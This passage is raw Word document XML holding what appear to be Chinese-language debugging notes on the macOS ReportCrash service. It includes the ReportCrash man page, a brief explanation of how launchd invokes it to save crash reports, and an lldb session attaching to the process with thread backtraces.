    <w:p w:rsidR="00105341" w:rsidRPr="00105341" w:rsidRDefault="00105341" w:rsidP="00105341">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105341">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                       EXCEPTION_STATE_IDENTITY | MACH_EXCEPTION_CODES, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105341" w:rsidRPr="00105341" w:rsidRDefault="00105341" w:rsidP="00105341">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105341">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                       MACHINE_THREAD_STATE);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105341" w:rsidRDefault="00105341" w:rsidP="00105341"/>
    <w:p w:rsidR="00420C4F" w:rsidRDefault="00420C4F" w:rsidP="00420C4F"/>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00B913BA" w:rsidP="00224DD4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/System/Library/CoreServices/</w:t>
      </w:r>
      <w:r w:rsidRPr="00707708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r w:rsidR="00186FB0" w:rsidRPr="00707708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Crash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="002151C5"/>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">sh-3.2# man ReportCrash </w:t>
      </w:r>
    </w:p>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p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t>ReportCrash(8)            BSD System Manager's Manual           ReportCrash(8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01"/>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>NAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     ReportCrash -- Generates crash reports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01"/>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t>SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     ReportCrash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01"/>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t>DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     ReportCrash analyzes crashing processes and saves a crash report to disk.  A crash report contains information that can help a developer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     diagnose the cause of a crash.  ReportCrash also records the identity of the crashing process and the location of the saved crash report  in the system.log and the ASL log database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01"/>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     ReportCrash is invoked automatically by launchd when a crash is detected.  For applications and other processes running in the per-user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     launchd context, ReportCrash runs as a LaunchAgent and saves crash reports in the user's ~/Library/Logs/DiagnosticReports/ directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     For daemons, other processes running in the system launchd context and other privileged processes, ReportCrash runs as a LaunchDaemon and</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     saves crash reports in the system's /Library/Logs/DiagnosticReports directory where they are only readable by admin users.  If there are</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     too many crash reports saved for a particular process, older reports will automatically be removed in order to conserve disk space.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01"/>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     launchtl can be used to disable and re-enable crash reporting.  To disable crash reporting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01"/>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">           launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">           sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Root.plist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01"/>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     To re-enable crash reporting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01"/>
    <w:p w:rsidR="00605F01" w:rsidRPr="009C04D9" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="009C04D9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRPr="009C04D9" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C04D9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">           sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Root.plist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01"/>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     For application crashes (but not background process crashes) ReportCrash will display a dialog notifying the user that the application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     unexpectedly quit and offering to reopen the application or send the report to Apple.  For developers, the behavior of this dialog can be</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     adjusted using /Developer/Applications/Utilities/CrashReporterPrefs.app which is installed as part of the developer tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01"/>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     Crash reports which are sent to Apple are submitted anonymously by the SubmitDiagInfo process.  The reports are used by Apple to improve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     its products.  Users who need support should use http://www.apple.com/support or other authorized support channels.  Developers who are</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     ADC members should report bugs using http://bugreporter.apple.com in order to allow for two way communication between Apple and the bug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t xml:space="preserve">     reporter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00605F01" w:rsidRDefault="00605F01" w:rsidP="00605F01">
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00707708" w:rsidRDefault="00707708" w:rsidP="002151C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每当</w:t>
      </w:r>
      <w:r>
        <w:t>Application crash</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，</w:t>
      </w:r>
      <w:r w:rsidRPr="00707708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lanchd OpenProcess </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/System/Library/CoreServices/</w:t>
      </w:r>
      <w:r w:rsidRPr="00707708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r w:rsidR="00186FB0" w:rsidRPr="00707708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Crash</w:t>
      </w:r>
      <w:r w:rsidRPr="00707708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00707708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后者调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00707708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CrashReporterFramework!CRSaveProblemReport </w:t>
      </w:r>
      <w:r w:rsidRPr="00707708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写到</w:t>
      </w:r>
      <w:r w:rsidR="005A01E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidR="005A01E4">
        <w:t>/Library/Logs/</w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00707708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iagnosticReports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00707708" w:rsidRDefault="00707708" w:rsidP="002151C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
      <w:r>
        <w:t>点击</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>上的</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B913BA">
        <w:t>Report…</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00B913BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>展开</w:t>
      </w:r>
      <w:r w:rsidR="00B913BA">
        <w:t>的时候</w:t>
      </w:r>
      <w:r w:rsidR="00B913BA" w:rsidRPr="00707708">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CrashReporterFramework!</w:t>
      </w:r>
      <w:r w:rsidR="00B913BA" w:rsidRPr="00B913BA">
        <w:t>_CROpenProblemReport</w:t>
      </w:r>
      <w:r w:rsidR="00B913BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会被</w:t>
      </w:r>
      <w:r w:rsidR="00B913BA">
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidR="00B913BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>sh-3.2# man lldb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>sh-3.2# lldb -w ReportCrash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb) target create "ReportCrash"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>error: unable to find executable for 'ReportCrash'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb) q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>sh-3.2# man lldb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>sh-3.2# man lldb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>sh-3.2# lldb -w -n ReportCrash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb) process attach --name "ReportCrash" --waitfor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>Process 25625 stopped</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>* thread #1: tid = 0x3b9fea, 0x00007fffd1ca3fde libsystem_kernel.dylib`__semwait_signal + 10, queue = 'com.apple.main-thread', stop reason = signal SIGSTOP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #0: 0x00007fffd1ca3fde libsystem_kernel.dylib`__semwait_signal + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>libsystem_kernel.dylib`__semwait_signal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>-&gt;  0x7fffd1ca3fde &lt;+10&gt;: jae    0x7fffd1ca3fe8            ; &lt;+20&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1ca3fe0 &lt;+12&gt;: movq   %rax, %rdi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1ca3fe3 &lt;+15&gt;: jmp    0x7fffd1c9cd94            ; cerror</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1ca3fe8 &lt;+20&gt;: retq   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE"/>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>Executable module set to "/System/Library/CoreServices/ReportCrash".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>Architecture set to: x86_64h-apple-macosx.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t>(lldb) bt all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>* thread #1: tid = 0x3b9fea, 0x00007fffd1ca3fde libsystem_kernel.dylib`__semwait_signal + 10, queue = 'com.apple.main-thread', stop reason = signal SIGSTOP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">  * frame #0: 0x00007fffd1ca3fde libsystem_kernel.dylib`__semwait_signal + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #1: 0x00007fffd1c2ab72 libsystem_c.dylib`nanosleep + 199</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #2: 0x00007fffd1c2a9d3 libsystem_c.dylib`sleep + 42</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #3: 0x0000000108e62488 ReportCrash`___lldb_unnamed_function256$$ReportCrash + 714</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #4: 0x00007fffd1b75255 libdyld.dylib`start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #5: 0x00007fffd1b75255 libdyld.dylib`start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE"/>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">  thread #2: tid = 0x3b9ff0, 0x00007fffd1c9c50a libsystem_kernel.dylib`swtch_pri + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #0: 0x00007fffd1c9c50a libsystem_kernel.dylib`swtch_pri + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #1: 0x00007fffd1d8d5a1 libsystem_pthread.dylib`_pthread_find_thread + 108</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #2: 0x00007fffd1d8d4dc libsystem_pthread.dylib`_pthread_lookup_thread + 81</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #3: 0x00007fffd1d8b9fa libsystem_pthread.dylib`pthread_mach_thread_np + 37</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #4: 0x00007fffc838a14c CoreSymbolication`CSCppExceptionSafeThread::CSCppExceptionSafeThread(void () block_pointer) + 120</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #5: 0x00007fffc838a099 CoreSymbolication`WorkAroundRadar6182276ExceptionSafeInvocation(Workaround6182276TMachOHeaderIterator*) + 115</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #6: 0x00007fffc8389f50 CoreSymbolication`TMachOHeaderIterator&lt;SizeAndEndianness&lt;Pointer64, LittleEndian&gt; &gt;::TMachOHeaderIterator(CSCppMachTaskContainer const&amp;, unsigned long long, char*, char*, unsigned long, unsigned int, TMachOHeaderIteratorHelper&lt;SizeAndEndianness&lt;Pointer64, LittleEndian&gt; &gt;&amp;) + 378</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #7: 0x00007fffc8388c94 CoreSymbolication`CSCppMachTask::symbol_owners(bool, unsigned int) + 226</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frame #8: 0x00007fffc83a27a6 CoreSymbolication`CSSymbolicatorCreateWithCSCppMachTaskFlagsAndNotification(std::__1::unique_ptr&lt;CSCppMachTask, std::__1::default_delete&lt;CSCppMachTask&gt; &gt;, unsigned int, void (unsigned int, _CSNotificationData) block_pointer) + 48</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #9: 0x00007fffc83a2707 CoreSymbolication`CSSymbolicatorCreateWithTaskPidFlagsAndNotification + 53</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #10: 0x0000000108e51c38 ReportCrash`___lldb_unnamed_function70$$ReportCrash + 5917</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #11: 0x0000000108e62100 ReportCrash`___lldb_unnamed_function255$$ReportCrash + 703</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #12: 0x0000000108e631c7 ReportCrash`___lldb_unnamed_function265$$ReportCrash + 461</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #13: 0x0000000108e63250 ReportCrash`___lldb_unnamed_function266$$ReportCrash + 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #14: 0x00007fffd1c9bedc libsystem_kernel.dylib`mach_msg_server_once + 476</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #15: 0x0000000108e61cab ReportCrash`___lldb_unnamed_function251$$ReportCrash + 79</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #16: 0x00007fffd1d8caab libsystem_pthread.dylib`_pthread_body + 180</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #17: 0x00007fffd1d8c9f7 libsystem_pthread.dylib`_pthread_start + 286</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #18: 0x00007fffd1d8c221 libsystem_pthread.dylib`thread_start + 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE"/>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">  thread #3: tid = 0x3b9ff1, 0x00007fffd1c9c41a libsystem_kernel.dylib`mach_msg_trap + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #0: 0x00007fffd1c9c41a libsystem_kernel.dylib`mach_msg_trap + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #1: 0x00007fffd1c9b867 libsystem_kernel.dylib`mach_msg + 55</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #2: 0x00007fffd1c9be34 libsystem_kernel.dylib`mach_msg_server_once + 308</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #3: 0x0000000108e61cab ReportCrash`___lldb_unnamed_function251$$ReportCrash + 79</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #4: 0x00007fffd1d8caab libsystem_pthread.dylib`_pthread_body + 180</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frame #5: 0x00007fffd1d8c9f7 libsystem_pthread.dylib`_pthread_start + 286</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #6: 0x00007fffd1d8c221 libsystem_pthread.dylib`thread_start + 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE"/>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">  thread #4: tid = 0x3b9ff2, 0x00007fffd1ca44e6 libsystem_kernel.dylib`__workq_kernreturn + 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE17AE" w:rsidRDefault="00EE17AE" w:rsidP="00EE17AE">
      <w:r>
        <w:t xml:space="preserve">    frame #0: 0x00007fffd1ca44e6 libsystem_kernel.dylib`__workq_kernreturn + 10</w:t>
      </w:r>
    </w:p>
